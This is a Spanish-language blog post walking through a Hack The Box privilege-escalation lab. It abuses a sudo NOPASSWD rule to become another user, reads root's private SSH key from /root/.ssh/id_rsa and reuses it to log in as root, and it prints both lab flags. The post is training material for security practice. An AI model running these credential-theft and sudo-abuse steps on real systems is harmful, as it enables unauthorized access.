DEV Community

Cover image for Walkthrough: Cómo resolver un laboratorio de escalada de privilegios en Hack The Box
Indira
Indira

Posted on

Walkthrough: Cómo resolver un laboratorio de escalada de privilegios en Hack The Box

A veces, resolver un laboratorio de escalada de privilegios parece más complicado de lo que realmente es. Este walkthrough te guiaré paso a paso para completar el reto sin que te marees.

Lección clave: La solución muchas veces es más simple de lo que piensas, así que empieza siempre con lo básico.


Paso 1: Conéctate al servidor

Lo primero que debes hacer es conectarte al servidor usando las credenciales proporcionadas:

ssh user1@<IP> -p <PUERTO>
Enter fullscreen mode Exit fullscreen mode

Verifica tu entorno inicial:

  • ¿Quién eres?: Usa whoami para saber el usuario actual.
  • ¿Dónde estás?: Usa pwd para conocer tu ubicación en el sistema.
  • ¿Qué tienes alrededor?: Usa ls -la para explorar los archivos en tu directorio.

Paso 2: Enumera permisos con sudo

Una vez conectado, verifica qué permisos tienes como usuario inicial. Este paso es clave para descubrir posibles rutas de escalada:

sudo -l
Enter fullscreen mode Exit fullscreen mode

Busca algo como esto:

(user2 : user2) NOPASSWD: /bin/bash
Enter fullscreen mode Exit fullscreen mode

Esto indica que puedes ejecutar /bin/bash como user2 sin contraseña. Si ves algo similar, ¡vas por buen camino!


Paso 3: Cambia al usuario user2

Aprovecha los permisos descubiertos en el paso anterior para convertirte en user2:

sudo -u user2 /bin/bash
Enter fullscreen mode Exit fullscreen mode

Verifica que ahora estás operando como user2:

whoami
Enter fullscreen mode Exit fullscreen mode

Paso 4: Encuentra la primera bandera

Como user2, busca y lee el archivo flag.txt en el directorio de este usuario:

cat /home/user2/flag.txt
Enter fullscreen mode Exit fullscreen mode

HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

¡Felicidades! Ya tienes la primera bandera. Ahora vamos por el acceso a root.


Paso 5: Escala privilegios a root

El objetivo final es obtener acceso como root. Aquí hay una posible estrategia:

Busca el archivo de clave SSH de root:

cat /root/.ssh/id_rsa
Enter fullscreen mode Exit fullscreen mode

Si tienes acceso a este archivo:

Image description

Copia su contenido y guárdalo en tu máquina local en un archivo llamado id_rsa. Para ésto vas a escribir

vim id_rsa
Enter fullscreen mode Exit fullscreen mode

Pegas el contenido del archivo y escribes wq para guardar los cambios y salir.

Asegúrate de que el archivo tenga los permisos correctos:

chmod 600 id_rsa
Enter fullscreen mode Exit fullscreen mode

Usa la clave para conectarte al servidor como root:

ssh root@<IP> -p <PUERTO> -i id_rsa 
Enter fullscreen mode Exit fullscreen mode

Paso 6: Encuentra la bandera de root

Ahora que eres root, ve al directorio /root y lee el archivo flag.txt:

cat /root/flag.txt
Enter fullscreen mode Exit fullscreen mode

HTB{pr1v1l363_35c4l4710n_2_r007}

Laboratorio listo!

Reflexiones finales
Este laboratorio nos enseña algo importante: muchas veces, la solución más efectiva es también la más simple. Antes de complicarte con estrategias avanzadas, recuerda:

  • Enumera lo básico: Comienza con comandos simples como sudo -l o ls -la.
  • Explora opciones obvias: Aprovecha lo que ya tienes antes de buscar herramientas externas.
  • Reflexiona después de cada reto: Cada experiencia es una oportunidad para mejorar.
  • ¡Ahora es tu turno de aplicar este conocimiento y enfrentarte a nuevos desafíos con confianza!

Sentry image

See why 4M developers consider Sentry, “not bad.”

Fixing code doesn’t have to be the worst part of your day. Learn how Sentry can help.

Learn more

Top comments (0)

Sentry image

See why 4M developers consider Sentry, “not bad.”

Fixing code doesn’t have to be the worst part of your day. Learn how Sentry can help.

Learn more